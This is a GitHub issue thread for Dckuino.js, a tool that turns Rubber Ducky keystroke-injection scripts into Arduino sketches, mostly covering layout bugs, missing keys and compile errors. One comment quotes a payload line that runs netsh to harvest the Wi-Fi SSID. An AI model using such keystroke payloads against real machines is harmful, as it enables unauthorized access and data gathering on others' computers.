[2016-08-20 21:22] Plazmaz opened #1 "Github Pages"
I thought it might be worth suggesting adding a gh-pages branch, which can mirror master. This would allow for the project to be live at thecakeisgit.github.io/DuckuinoPlus/

[2016-08-21 13:20] Thecakeisgit commented on #1
It's a good idea, ill do this now :D

[2016-08-21 13:26] Thecakeisgit commented on #1
Done : https://thecakeisgit.github.io/DuckuinoPlus/

[2016-08-21 13:26] #1 closed

[2016-09-12 14:12] DanielShlomo opened #2 "Error: Unknown command or key 'REM' at line: 1."
Hi there,
Why there is no support for "REM"?
It's not a "issue" but it's kinda frustrating to remove all the comments from the payloads.

Anyway, i forked it and added the REM function to my branch.

Thanks

[2016-09-12 17:45] DanielShlomo commented on #2
I added it in my branch

[2016-09-12 17:45] #2 closed

[2016-09-29 15:47] d4n5h opened #3 "A few issues"
@Thecakeisgit
1. You can't use PHP on GitHub Pages.

2. STRING command has a bug,it adds lead whites-spaces all the time.
Sometimes you need to add a white-space in the beginning of a string, but not all the time.
In my compiler you can do "STRING Without white space" and also "STRING⋅⋅With white space".

3. Look at my updated GUI/Index page. i added Codemirror for syntax highlighting and and i've

[2016-09-29 15:54] Thecakeisgit commented on #3
1. Thanks i did'nt know.
2. Ill fix that
3. Cool, it's very good :D

[2016-09-29 16:16] d4n5h commented on #3
@Thecakeisgit
I've reimplemented console debugging like in your compiler...
Now you don't have any excuse for not switching to my compiler :)

[2016-09-29 16:53] d4n5h commented on #3
@Thecakeisgit
I've "Download Payload" button...

[2016-09-29 18:00] d4n5h commented on #3
@Thecakeisgit
You didn't add REPLAY/REPEAT

[2016-09-29 18:02] d4n5h commented on #3
"CTRL ALT TEST" Don't work lol

[2016-09-29 18:03] Thecakeisgit commented on #3
Yep i know ^^ i'll add id this soon, i added payload dl too
Yes it works ! it throws an error as expected ! ;D

[2016-09-29 18:07] d4n5h commented on #3
Sure... if you don't realise that REPEAT is dependant on everything to be in same line, so my solution is better ;)

[2016-09-29 18:08] Thecakeisgit commented on #3
Leave me this ;D

[2016-09-29 18:08] Thecakeisgit commented on #3
You'll see :D

[2016-09-29 21:32] d4n5h commented on #3
@Thecakeisgit
Issue with REPEAT/REPLAY:
Try doing:
CTRL a
REPEAT 10

[2016-09-29 21:42] Thecakeisgit commented on #3
Yes ?

[2016-09-30 07:08] d4n5h commented on #3
@Thecakeisgit
Try:
CRTL ALT a
REPLAY 10

[2016-09-30 07:11] d4n5h commented on #3
@Thecakeisgit
My bad, REPEAT is working great.
Can i use your solution?

[2016-09-30 09:16] #3 closed

[2016-09-30 11:01] d4n5h opened #4 "ALT F2"
I switched to your compiler and reverted back because someone (EchoUnderscoreNine) had an issue:
"console Error: Unknown command or key 'F2' at line: 2. ---> any guesses?
it was running fine til your update an hour ago."

[2016-09-30 11:29] d4n5h commented on #4
@Thecakeisgit
Oh you just need to add F-keys to the array...

[2016-09-30 12:32] Thecakeisgit commented on #4
Fixed with ur help :D #5

[2016-09-30 12:32] #4 closed

[2016-09-30 12:34] Thecakeisgit commented on #3
Of course you can do it ! ;D

[2016-09-30 13:22] d4n5h commented on #4
You want me to merge my repository with yours? It's basically the same compiler now just a different GUI (mine is better) and download function (yours is better, if you can add it it will be awesome) what do you say?

[2016-10-18 18:46] d4n5h opened #7 "Your compiler is totally bugged"
1. You added the typeKey utility function in the end of the payload so it will not run...
Fix: Add it to the beginning of the payload/script (before the `void setup(){...};`).

2. You don't have support for PAGEUP/PAGEDOWN.

3. You didn't add `#include <Keyboard.h>` and/or `#include <Mouse.h>` at the beginning of the payload.

As it seems, you probably don't even have a atmega32u4 board to test yo

[2016-10-18 19:10] Thecakeisgit commented on #7
1. Ok Thanks, i'll fix it.
2. I'll add this too
3. Keyboard.h is already included by arduino core, why include it again ? c:

I got a wonderful arduino mini to test this ;D And i worked without the include ^^

[2016-10-18 19:14] d4n5h commented on #7
The Arduino (Pro) Mini is a ATmega328 based MCU.
You cannot use the Keyboard.h library with it so there is no way that you've tested it and it worked.

[2016-10-18 19:16] Thecakeisgit commented on #7
Sorry it was an Arduino Micro ;D

[2016-10-18 19:16] d4n5h commented on #7
Also, you would get a error because of the typeKey() function.

[2016-10-18 19:19] Thecakeisgit commented on #7
Nope, i tested ^^ No error.
With this:
[code]

[2016-10-18 19:22] d4n5h commented on #7
It outputs an error.

You didn't even check it.

[2016-10-18 19:24] d4n5h commented on #7
[code]

[2016-10-18 19:24] d4n5h commented on #7
Again, you just bullshiting....
Just fix you shit....

[2016-10-18 19:26] Thecakeisgit commented on #7
Yes i'll fix it tomorrow, i've tested, but on linux, so i don't know what can change but i did'nt got any error *-*

[2016-10-18 19:31] d4n5h commented on #7
I've tested it on macOS and on Windows 10 and it's totally bugged...

[2016-10-18 19:37] Thecakeisgit commented on #7
Ok i'll fix i said, don't get angry..

[2016-10-19 04:54] Thecakeisgit commented on #7
When i add #include <Keyboard.h>, this happens :
sketch_oct19a.ino:5:22: fatal error: Keyboard.h: No such file or directory
compilation terminated.

[2016-10-19 04:56] Thecakeisgit commented on #7
What's your arduino ide version ? Mine is 2:1.0.5+dfsg2-4

[2016-10-19 11:55] d4n5h commented on #7
It's in the error report - Arduino: 1.6.11

[2016-10-19 13:12] d4n5h commented on #7
I know what is the problem. You probably didn't set the MCU type to Arduino/Genuino Micro.
It's in Tools->Board.

[2016-10-19 15:20] Thecakeisgit commented on #7
It was set to Arduino Micro, and i compiled, without uploading and it did this error.. Kinda weird.

[2016-10-19 15:22] Thecakeisgit commented on #7
When i use Keyboard object, without including, this works.. \*-\*

[2016-10-19 15:28] Thecakeisgit commented on #7
My bad, i updated my arduino ide version and it works..

[2016-10-19 15:32] d4n5h commented on #7
Maybe we should add a note at the README file that indicates that the IDE must be updated to the latest version so there will be no cross-platform compatibility issues.

[2016-10-19 15:36] Thecakeisgit commented on #7
Yep ^^ it was a problem in Ubuntu repository, there is only arduino 2:1.0.5

[2016-10-19 16:02] Thecakeisgit commented on #7
[a7330f6](https://github.com/Thecakeisgit/Dckuino.js/commit/a7330f65e555fa80d547b88961cee64c65dbd79c) resolved it.

[2016-10-19 16:02] #7 closed

[2016-10-24 16:15] d4n5h opened #9 "Suggestion regarding our projects (Not a Issue)"
@Thecakeisgit
In order to make the mouse emulation be absolute (not relative) regarding screen resolution,
I've switched from the Arduino HID library to this library: https://github.com/NicoHood/HID
That means there will be a dependency in order to use my compiler.
I'm suggesting that you'll keep using the standard Arduino HID library on your compiler to give people the option to use it easily if

[2016-10-24 18:47] Thecakeisgit commented on #9
Ok wait a min ^^
My updates are "In a good way", i'm gently working on it :D

[2016-10-24 18:50] #9 closed

[2016-10-25 03:12] Pedrinbeep opened #10 "Keyboard Library in other languages?"
Hi Thecakeisgit!

You Dckuino.js is awesome but I have a little problem. My keyboard is not english and this makes mistakes when the script is runing. Do you have another library for a diferent keyboard? In my case is a Spanish keyboard.

Thank you for your work.

[2016-10-25 09:14] Thecakeisgit commented on #10
Hey man :D, this can't be archived with a library, i got the same issue, because i got a french keyboard.. You need to modify your Arduino source code, the file HID.cpp contains a var named _asciimap.. You can search on the net to find the HID.cpp for your needs :)

Also, you gave me an idea to fix your problem, so i'll don't close the issue now. I'll inform u if i find something ;D

[2016-10-25 09:14] Thecakeisgit commented on #10
@Pedrinbeep

[2016-10-25 11:06] Thecakeisgit commented on #10
@Pedrinbeep did u find something ? @d4n5h Any tip ? :D

[2016-10-25 11:19] d4n5h commented on #10
@Pedrinbeep @Thecakeisgit
It's on my TODO list as well.
I think that the standard Arduino keyboard library is based on ASCII characters.
In order to bring new layouts we need somehow to switch to UTF-8 and add those characters to the compiler's array of keys.
I'll take a look on it later.

[2016-10-25 11:23] Thecakeisgit commented on #10
@d4n5h If u understand french http://www.zem.fr/utiliser-mouse-keyboard-azerty-arduino-pro-micro-teensy/

[2016-10-25 11:26] d4n5h commented on #10
@Thecakeisgit Not sure if it will work in this case but a simple workaround could be just to switch the keyboard input language to english with a "SHIFT ALT" combo. But if you have to print characters in other languages it will not work.

[2016-10-25 11:28] d4n5h commented on #10
@Thecakeisgit  Oh, i didn't knew that you have a totally different physical key layout. Weird...
So my "workaround" will not work in this case...

[2016-10-25 11:30] Thecakeisgit commented on #10
Yep, i know but, it don't work on every computer, for me i uninstalled english locale, so SHIFT ALT just do NOTHING, so that's not acceptable.. But we can create a "LocaleKeyboard" project that we use both.
The idea is to create modules(asciimap_fr, asciimap_es, ...) and to just do Keyboard.init("fr_FR") to set locale..
What do u say about that ? @d4n5h

[2016-10-25 11:32] d4n5h commented on #10
@Thecakeisgit Good idea! i'm in.

[2016-10-25 11:32] Thecakeisgit commented on #10
Add me as contributor ;D

[2016-10-25 11:32] Thecakeisgit commented on #10
@d4n5h

[2016-10-25 11:32] d4n5h commented on #10
In my repo?

[2016-10-25 11:34] d4n5h commented on #10
@Thecakeisgit I've added you as a collaborator.

[2016-10-25 11:39] Thecakeisgit commented on #10
@d4n5h Come :D https://github.com/Thecakeisgit/LocaleKeyboard

[2016-10-25 11:49] Thecakeisgit commented on #10
@d4n5h https://hack.chat/?LocaleKeyboard

[2016-10-25 12:31] Thecakeisgit commented on #10
@Pedrinbeep We're working on a port of Keyboard arduino Lib, here -> https://github.com/Thecakeisgit/LocaleKeyboard
Feel free to comment and help :+1:

[2016-10-25 15:46] Pedrinbeep commented on #10
@Thecakeisgit Great! I´ll try to help ;)

[2016-10-26 00:40] Pedrinbeep commented on #10
@Thecakeisgit @d4n5h I found this link, you can be helpful?
LINK: https://forums.hak5.org/index.php?/topic/36068-keyboard-layout-modified-spanish-keyboard-layout/

[2016-10-26 07:38] Thecakeisgit commented on #10
It could be helpful, if the links were not dead :/

[2016-10-26 07:38] Thecakeisgit commented on #10
@Pedrinbeep

[2016-10-26 09:27] Pedrinbeep commented on #10
I sent a few PM to this guys, if they response, I will let you know.
@Thecakeisgit

[2016-10-26 19:47] Pedrinbeep commented on #10
@Thecakeisgit Here is the es.properties file for download:
https://www.dropbox.com/s/4ibsw9l9m1y560r/es.properties?dl=0

I hope could help! ;)

[2016-10-26 21:14] Thecakeisgit commented on #10
@Pedrinbeep Thanks man, i got the solution, gimme tomorrow and it will be done ;D

[2016-11-02 10:34] Thecakeisgit commented on #10
Fixed with 7ee4217 & 02fd692.
Now we need to update in LocaleKeyboard.js.

[2016-11-02 10:34] #10 closed

[2016-11-05 02:13] Thecakeisgit opened #11 "DEFAULT_DELAY is not supported."
Returning back this error :
[code]

[2016-11-05 11:53] #11 closed

[2016-11-17 08:01] NovaHowl opened #12 "Enter problem"
When using the Enter command, it just types (

[2016-11-17 14:14] Thecakeisgit commented on #12
Hi @NovaHowl, please tell me what is you keyboard layout, it's caused by your layout..

[2016-11-17 19:29] NovaHowl commented on #12
Australian

[2016-11-17 19:30] NovaHowl commented on #12
Everything else works fine, just the enter command,

[2016-11-17 19:30] NovaHowl commented on #12
Thecakeisgit

[2016-11-17 19:48] Thecakeisgit commented on #12
*-* It's weird, @NovaHowl are u sure your Keyboard layout is exactly the same as US Keyboard layout ?

[2016-11-17 20:21] NovaHowl commented on #12
Yep, and I tried switching it to UK and it didn't work.

[2016-11-17 20:24] Thecakeisgit commented on #12
Hmm okay, and you used <b>Download Sketch!</b> button ?

[2016-11-17 20:24] Thecakeisgit commented on #12
@NovaHowl

[2016-11-17 20:26] NovaHowl commented on #12
Download sketch doesn't work for me. I also noticed I had to remove #include "Keyboard.h" @Thecakeisgit

[2016-11-17 20:27] NovaHowl commented on #12
Otherwise it would say (error compiling for Teensy 3.1/3.2

[2016-11-17 20:27] Thecakeisgit commented on #12
WTF, Hmm what's ur Arduino ide version ?

[2016-11-17 20:28] Thecakeisgit commented on #12
Are you on linux ? @NovaHowl

[2016-11-17 20:28] NovaHowl commented on #12
1.6.11 @Thecakeisgit

[2016-11-17 20:28] NovaHowl commented on #12
Nope

[2016-11-17 20:30] Thecakeisgit commented on #12
Okay, same version, @NovaHowl so it's maybe because you're trying to compile an Arduino code based on Arduino core for teensy.. Don't u think ?

[2016-11-17 20:31] NovaHowl commented on #12
Yeah maybe... Everything else in the converter works just fine tho

[2016-11-17 20:32] NovaHowl commented on #12
GUI r works, STRING works and everything else, but the ENTER function doesn't work. @Thecakeisgit

[2016-11-17 20:34] Thecakeisgit commented on #12
Okay, because with same thing with an Arduino mini, it works perfectly well.. But why the #include "Keyboard.h" fails... I don't know, it could be this..

[2016-11-17 20:35] NovaHowl commented on #12
When leaving #include "Keyboard.h"

In file included from C:\Users\Nova\AppData\Local\Temp\arduino_modified_sketch_60053\sketch_nov18a.ino:5:0:

C:\Program Files (x86)\Arduino\libraries\Keyboard\src/Keyboard.h:25:17: fatal error: HID.h: No such file or directory

 #include "HID.h"

                 ^

compilation terminated.

Error compiling for board Teensy 3.2 / 3.1.

[2016-11-17 20:38] NovaHowl commented on #12
@Thecakeisgit

[2016-11-17 20:41] Thecakeisgit commented on #12
Hmm, yes it's definitely because it's a teensy.. I'm sorry, but i think i can't help you @NovaHowl because i don't know teensy libs.. Sorry.. But if you find any solution, please tell me, I'll be interested.. ;D

Do you mind if i close the issue ?

[2016-11-17 20:42] NovaHowl commented on #12
Alright, that's fine. This is the only converter that came close to working with my Teensy 3.2. Anyways...

[2016-11-17 20:44] Thecakeisgit commented on #12
I'm sorry man, good night ;D @NovaHowl

[2016-11-17 20:44] #12 closed

[2016-11-17 20:45] NovaHowl commented on #12
Good night to you, good morning to me ;)

[2016-11-22 17:18] gh7531 opened #13 "Layout messed up using Firefox/Chrome"
Hello,
I tried to compile and download a script using the live version but if I load the page in Firefox or Chrome the layout of the page is messed up.
![brokenwebpage](https://cloud.githubusercontent.com/assets/9028609/20533958/b64cd536-b0df-11e6-81fe-40778c618640.png)

If I switch my useragent to a mobile device it looks fine.
![webpage](https://cloud.githubusercontent.com/assets/9028609/2053395

[2016-11-22 17:26] gh7531 opened #14 "Download button not working using Firefox/Chrome/Edge"
Hello,
as stated in the title the download button isn't working for me. Nothing happens if I click on it.
Since it doesn't do anything besides changing the style of the button if the mouse hovers over it I can't provide screenshots or error messages.

Probably related to #13

If I remember correctly a few weeks ago it worked fine but I'm not sure about that.

[2016-11-22 17:39] Thecakeisgit commented on #14
Okay thanks for your report man ;D @gh7531.
I'll see how i can fix this up.

[2016-11-22 17:43] Thecakeisgit commented on #14
It's due to github raw.. I included my js file from it.. @gh7531

[2016-11-22 17:50] #14 closed

[2016-11-22 17:56] Thecakeisgit commented on #13
I'll try to fix this, but i can't reproduce the bug because i got a 4:3 screen.. Could you try on dev.cak3repo.xyz(Who is my test server) @gh7531 ? I tried a fix :)

[2016-11-22 18:12] gh7531 commented on #13
Nope isn't working :( it looks the same.
![webpage](https://cloud.githubusercontent.com/assets/9028609/20535988/83be6fd2-b0e7-11e6-9021-0fb1308d5fda.png)

On my 4:3 second screen it's messed up to.

[2016-11-22 18:24] Thecakeisgit commented on #13
Hmm WTF, i can't reproduce it \*-\* @gh7531, have you updated your Firefox ?

[2016-11-22 18:26] Thecakeisgit commented on #13
Maybe your version doesn't support the css3 calc() function. @gh7531

[2016-11-22 18:30] Thecakeisgit commented on #13
What's you resolution ? @gh7531

[2016-11-22 18:52] Thecakeisgit commented on #13
Please retry @gh7531 https://dev.cak3repo.xyz

[2016-11-22 19:29] gh7531 commented on #13
Still no luck :(
I'm using FF 50.0 my resolution is 1920x1080.

While using the edge browser it's still messed up but not as badly
![wepage](https://cloud.githubusercontent.com/assets/9028609/20538643/63837144-b0f2-11e6-9749-69eb3543b889.png)

[2016-11-22 19:39] Thecakeisgit commented on #13
Okay, i'll wait to somebody else to send a comment here to really fix it \*-\* because i don't know what the fuck this is.. @gh7531
@d4n5h Any idea ?

[2016-11-23 22:54] ImaFridge commented on #13
I've got the same problem as @gh7531 derp derp

[2016-11-24 17:05] Thecakeisgit commented on #13
Ok i'll fix it soon, i reinstalled my test server.. @gh7531 @ImaFridge

[2016-11-25 14:12] KevinDenys opened #15 "Keyboard layout"
I have an Belgian Dot layout as keyboard. So when I try to write "azerty" using the programmed arduino leonardo it types "qwerty". How Can I fix this?

[2016-11-25 14:43] Thecakeisgit commented on #15
Approximately the same thing as #10

[2016-11-25 14:43] Thecakeisgit commented on #15
#10

[2016-11-25 14:46] Thecakeisgit commented on #15
You can use the **Download Sketch !** button ;D And select **fr_FR** locale, if you got a ~French Belgian keyboard ;D

[2016-11-25 21:03] KevinDenys commented on #15
Okay this fixed one of my problems, now I can't get Keyboard.press(KEY_LEFT_GUI); to work?

[2016-11-25 21:24] Thecakeisgit commented on #15
KEY_LEFT_GUI is hard coded, so if ut doesn't work, i don't know how you can make it work !
Try to post your entire code please ;D

[2016-11-25 22:36] KevinDenys commented on #15
`/*
 * Generated with <3 by Dckuino.js, an open source project !
 */

#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  delay(750);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

[2016-11-25 22:41] Thecakeisgit commented on #15
Hmm kinda weird, i don't know why it doesn't work.. @KevinDenys

[2016-11-25 22:42] KevinDenys commented on #15
Hmmmm I just tried running it on my windows 10 and here it opens the cmd. Looks like my windows 7 is being funky. Thanks for fixing the keyboard layout problem! Issue fixed

[2016-11-25 22:42] #15 closed

[2016-11-25 22:44] Thecakeisgit commented on #15
You're welcome ! @KevinDenys

[2016-11-25 22:51] KevinDenys commented on #13
1920x1080 here running last version of chrome. No problems.

[2016-11-25 22:56] Thecakeisgit commented on #13
@KevinDenys I got no idea of what happenig with these guys.. I can't reproduce it, and i don't even know how to fix.. Any idea ? @KevinDenys

[2016-11-25 22:58] KevinDenys commented on #13
Can we get a screenshot of the console when the page is loaded @imafridge @gh7531

[2016-11-26 08:37] gh7531 commented on #13
I'm not at home for the next 10 days so I can't provide the information I'm sorry. I'll do it as soon as I get home again.

[2016-11-26 15:21] ImaFridge commented on #13
![nvidia share_2016-11-26_16-19-49](https://cloud.githubusercontent.com/assets/23709056/20641250/577f408a-b3f4-11e6-98e9-b2fae6d5e09e.png)

[2016-11-26 15:29] Thecakeisgit commented on #13
Kinda weird, your Javascript console is saying something ? @ImaFridge

[2016-11-26 16:03] KevinDenys commented on #13
@ImaFridge thats the seytonic version. Can you try the https://thecakeisgit.github.io/Dckuino.js/

[2016-11-26 16:04] KevinDenys commented on #13
![image](https://cloud.githubusercontent.com/assets/17174443/20641526/5bd5d404-b3fa-11e6-89ed-bb93e86f0bff.png)
Firefox 1920x1080

[2016-11-26 16:11] Thecakeisgit commented on #13
572087d seems to fix it.. Try again please @ImaFridge :)

[2016-11-26 16:18] ImaFridge commented on #13
It works now! you guys rock <3
I used the Seytonic version bc i couldnt reacht the other site...

[2016-11-26 16:24] Thecakeisgit commented on #13
Thanks ! Fixed with 572087d.

[2016-11-26 16:24] #13 closed

[2017-01-23 15:57] MrMoDDoM opened #16 "MuKeyboard support"
Hi,
I create this library called MuKeyboard that enable (with the support from a little circuit) any Arduino/AVR board to support HID interface, thanks to the V-BUS framework.
I ask you if you could include a "flavor" tab for selecting which library use: the default in-build Arduino's HID Keyboard.h or our MuKeyboard.h
There are only few changes for your project:

- Obviously from ```#include "Key

[2017-01-23 17:44] Thecakeisgit commented on #16
Hmm why not :D, It's interesting, but we'll have a conflict with [Thecakeisgit/LocaleKeyboard.js](https://github.com/Thecakeisgit/LocaleKeyboard.js) who is a multi locale generator for Keyboard HID Arduino's Lib.
It won't work because your lib isn't the Keyboard.h lib(And this project will generate a custom Keyboard.<cpp|h>).. We'll need to work on this :D

[2017-01-23 18:16] gh7531 commented on #16
Sorry for hijacking this issue but does the MuKeyboard support full 8-bit ASCII or could it be implemented? @MrMoDDoM

[2017-01-23 22:38] MrMoDDoM commented on #16
@Thecakeisgit I saw that Dckuino uses LocaleKeyboard.js for generating the zip file and I'm thinking how to make much more compatible MuKeyboard with that..
Am I wrong if I say that is only relevant for downloading the zip file? I mean, just for the copy-and-paste guys like me, there should be no problem at this moment..

@gh7531 I'm not sure how to answer your question, but I can say that MuKeybo

[2017-01-25 14:40] Thecakeisgit commented on #16
@MrMoDDoM Not really generating a zip, obviously it's your navigator who generates a zip... LocaleKeyboard.js is generating a custom Keyboard.h & Keyboard.cpp to work with all locales :D

@gh7531 No problem, but the default library supports already 8-Bit ASCII, I think you mean EASCII (Extended ASCII who isn't supported by the base Keyboard lib)

[2017-01-31 15:34] MrMoDDoM commented on #16
@Thecakeisgit Sorry, I don't get why LocaleKeyboard could be a problem: because at this moment MuKeyboard is not compatible with LocaleKeyboard.js features, I was thinking that for people who just copy and paste code from Dckuino.js live page should be a good feature to let them choose which "flavor" should your project outputs the results.
I know that this means that the resulting sketch will wor

[2017-02-01 20:42] Thecakeisgit commented on #16
@MrMoDDoM, Okay if you got the time, you could send me a pull request with you changes :D

[2017-03-03 01:36] JonasZaverka opened #17 "Issue when compiling the sketch : "OSX Wallpaper Changer""
Hi I'm trying to translate basic OSX Wallpaper Changer and this error comes up in my compiler:

[code]

[2017-03-03 01:44] Plazmaz commented on #17
You should post the generated sketch file. Looks like you're missing the keyboard library.

[2017-03-17 00:19] chubbybarbarian opened #18 "Escape key not working"
![image](https://cloud.githubusercontent.com/assets/17054871/24023920/07964f32-0a75-11e7-95b8-753d4d99bc82.png)

here is my script /*
 * Generated with <3 by Dckuino.js, an open source project !
 */

#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

[2017-03-17 00:20] chubbybarbarian commented on #17
you type ENTER not return

[2017-03-17 22:27] #18 closed

[2017-03-18 09:49] Nurrl commented on #17
Sounds like a syntax error, did you downloaded or copied the script ?
(Are toi on Linux ? And if yes did you installed Arduino IDE with `apt-get` ?)

[2017-03-18 09:54] Nurrl commented on #18
Done, thanks for the report @chubbybarbarian and thanks to @Plazmaz for the pull request :D

[2017-03-18 23:29] Plazmaz commented on #18
no problem @Nurrl

[2017-03-21 22:07] PieJohnson opened #20 "'KEY_LEFT_ESC' was not declared in this scope"
The Arduino ide gives me the error "'KEY_LEFT_ESC' was not declared in this scope" when I try to verify the code.  Can someone tell me what the cause of this issue is?

[2017-03-22 06:00] Nurrl commented on #20
Just rebuild the code with Dckuino.js, this is a duplicate of #18 and has been fixed by #19 :D (The fix was to replace **KEY_LEFT_ESC** by **KEY_ESC**)
Thanks anyway for the report ^^

[2017-03-22 06:00] #20 closed

[2017-03-26 22:44] Uberlan opened #21 "Cool"
coll.

[2017-03-27 05:17] Nurrl commented on #21
.Lloc

[2017-03-27 05:18] #21 closed

[2017-04-01 17:30] delopa opened #23 "Uncorrect keys when using AZERTY French keyboard."
I'm french (sorry for my bad english), and I'm using an AZERTY keyboard and I've got some problems.
The code is not correctly executed, So I convert in QUERTY, the same.

[2017-04-02 07:52] Nurrl commented on #23
Hi @delopa (I'm French too, but for the general understanding I'll talk English ;D),
Did you copied and pasted the code or did you used the download button ? ;D

[2017-04-02 13:57] delopa commented on #23
Copy / paste, why ?

[2017-04-02 19:19] Nurrl commented on #23
Yes, this is because as you might know, the code is using the default Arduino Keyboard library(Which only works for English QWERTY layouts), but if you use the **Download Sketch** button, you can select the locale (For you **fr_FR**), and this will bundle a wonderful modified Keyboard library for your locale ;D

[2017-04-02 19:20] Nurrl commented on #23
Tell me if this doesn't worked, I'll reopen the issue.. ;D

[2017-04-02 19:20] #23 closed

[2017-04-02 19:48] Plazmaz commented on #23
Perhaps disabling copy/paste from the box would be smart when the locale is changed @Nurrl

[2017-04-03 08:54] delopa commented on #23
It works on Firefox ! Thanks !
But `Start download` didn't work on chrome (why ?)

[2017-04-03 14:53] Nurrl commented on #23
@Plazmaz Yes it would be cool simply to remake the GUI, and the core to make it modular as I said here : #22.

@delopa I don't know, I'll try to fix it when I'll rebuild the GUI ;D

[2017-04-12 17:47] miniminion100 opened #24 "Escape issue."
[code]

[2017-04-12 17:54] Nurrl commented on #24
This issue is a duplicate of #20, and has been fixed with ac3353c.

[2017-04-12 17:54] #24 closed

[2017-04-12 17:54] Nurrl commented on #24
Please recompile the code.

[2017-04-13 10:46] TJHUNTER2001 opened #25 "This doesn't work how it should work"
I try to open notepad and write some stuff in it but it doesn't work.
Here is the script:

[2017-04-13 11:42] Nurrl commented on #25
@TJHUNTER2001, this is not a compiler issue while the code compiles..

Are you using an English mapping, and did you used the download button or copy/paste ?
_It doesn't work_ is not really verbose, can you explain ?

[2017-04-13 15:13] TJHUNTER2001 commented on #25
Well, I think I found the problem.
It sends all the keys as a QWERTY keyboard were it should be sent as AZERTY.

For example:
"My name is TJ" becomes "Öz nqöe is TJ"

[2017-04-13 15:14] TJHUNTER2001 commented on #25
Note: it isn't QWERTY, it is QWERTZ

[2017-04-13 15:17] TJHUNTER2001 commented on #25
One solution I found is to press ALT+SHIFT and then write the strings.

Then the code would look like this:

[2017-04-13 15:32] TJHUNTER2001 commented on #25
This is another solution I came up with:

[2017-04-15 20:13] TJHUNTER2001 commented on #25
I still need some help with this, could anyone give a solution or tell me were to ask pls.

[2017-04-15 20:16] Plazmaz commented on #25
Please provide the following information to help us address the problem more easily:
The original duckyscript code
The Arduino output or the generated Arduino project
Your keyboard layout/language
The full output of the script
The expected output

[2017-04-16 07:16] TJHUNTER2001 commented on #25
- [x ] The original duckyscript code : Already posted
- [x ] The Arduino output or the generated Arduino project : See video
- [x ] Your keyboard layout/language : AZERTY (Dutch if it mathers)
- [x ] The full output of the script : See video
- [x ] The expected output : See video

PS: videos'll come later

[2017-04-16 07:28] TJHUNTER2001 commented on #25
Output original code:

[2017-04-16 07:47] TJHUNTER2001 commented on #25
Download file (.avi format) at:
https://drive.google.com/open?id=0By4Bw1LyCjW1MzM0MFpoVTdJanc

[2017-04-16 09:00] Plazmaz commented on #25
Try using the "Download Sketch" function instead of copying+pasting the code.

[2017-04-16 12:53] TJHUNTER2001 commented on #25
Same result :(

[2017-04-16 14:27] Nurrl commented on #25
By selecting the good locale.... @TJHUNTER2001

[2017-04-16 21:24] TJHUNTER2001 commented on #25
What do you mean with good locale?

[2017-04-18 10:20] Nurrl commented on #25
I mean an AZERTY locale like **fr_FR** :D

[2017-04-18 10:32] TJHUNTER2001 commented on #25
Sorry, feel me like a noob but how do I do that?

[2017-04-18 10:48] Nurrl commented on #25
Click the **Download Sketch** button, then select the locale and click **Download** :D

[2017-04-18 15:45] TJHUNTER2001 commented on #25
Didn't help :'(

[2017-04-18 17:58] Plazmaz opened #26 "Lay out goals and thoughts for v2.0"
I suggest laying out your thoughts and opening discussion for the v2.0 you've mentioned via an issue, and creating a milestone with the results.

[2017-04-24 16:06] Andsoeg commented on #25
This line;  Keyboard.print("cd \"%USERPROFILE%\\Desktop\" & for /f \"tokens=2 delims=:\" %A in ('netsh wlan show interface ^| findstr \"SSID\" ^| findstr /v \"BSSID\"') do set A=%A");

Turned out like this in console;

cd Æ%USERPROFILE%'DesktopÆ / for -f Ætokens\2 delims\ØÆ %A in )ænetsh wlan show interface &* findstr ÆSSIDÆ &* findstr -v ÆBSSIDÆæ= do set A\%A

Does the rubber ducky (arduino) use

[2017-04-24 16:50] Nurrl commented on #25
@Andsoeg On Windows you could add an <code>ALT SPACE</code> before the code...

[2017-05-02 15:04] pigoof opened #27 "Payload does not work"
Hi there,

I want to convert this ducky script to be readable for my arduino to execute but it does not convert because something about line 12 it says it doesnt understand A

Ill send you the ducky script if you can convert it for my - id appreciate it alot thanks!

[code]

[2017-05-02 15:52] Plazmaz commented on #27
The keys(CTRL + A, CTRL + C, etc) should be lowercase. Meaning your code should be this:

[code]

[2017-05-02 20:18] pigoof commented on #27
It partially worked but the code came across a problem...

Arduino: 1.8.2 (Windows 7), Board: "Arduino Leonardo"

Duckduino-microSD:165: error: 'KEY_LEFT_ESC' was not declared in this scope

??? know what went wrong?

[2017-05-02 21:05] pigoof commented on #27
I appreciate your help.
I dont know. latest version of what?

I got it to work by changing the error key_left_esc to key_left_CTRL - not sure if thats good or bad...
The only problem after that is there isnt enough room on the arduino.

Im following this guys instructions to put the code onto sd card -https://www.youtube.com/watch?v=ksvo1WDYQ7s

But it doesnt work... only when the arduino has some

[2017-05-02 21:10] Plazmaz commented on #27
The space issue can't be helped. I suggest using for loops in the generated code. Unfortunately, the channel you linked suggests the use of an outdated version of duckuino(hosted on seytonic.com). The bug you mentioned has been fixed previously. I suggest using the latest version we host on GitHub, which you can find if you look at the readme.md.

[2017-05-02 21:34] pigoof commented on #27
Okay so I used the converter like you said but how do I get it to work from sd card or put it on arduino from your converter?

This is the new code:
/* Converted by Duckuino:
* https://forums.hak5.org/index.php?/topic/32719-payload-converter-duckuino-duckyscript-to-arduino/?p=244590
* Enjoy!
*/
void setup() {
	Keyboard.begin();

type(KEY_LEFT_CTRL,false);
type('S',false);
Keyboard.releaseAll();
de

[2017-05-02 21:39] Plazmaz commented on #27
Sorry, should've been more specific, use this page https://nurrl.github.io/Dckuino.js/. As for the SD card, that is unrelated to this project, I suggest asking the creator of that youtube video. I think this issue is resolved now. Care to close it, @Nurrl?

[2017-05-02 22:11] Nurrl commented on #27
I See ! He use you old Duckuino @Plazmaz, so please use the now live version ! Link above :D
Let us know if it works ^^

[2017-05-02 22:12] Nurrl commented on #27
Yep no problem, I'll mark it as invalid while this is referred to the old project :D @Plazmaz

[2017-05-02 22:12] #27 closed

[2017-05-02 22:15] Plazmaz commented on #27
Just FYI, I chatted with the author of that video, and he said he would update to the latest version. On another note, can I contact you via email or some other platform @Nurrl?

[2017-05-02 22:18] Nurrl commented on #26
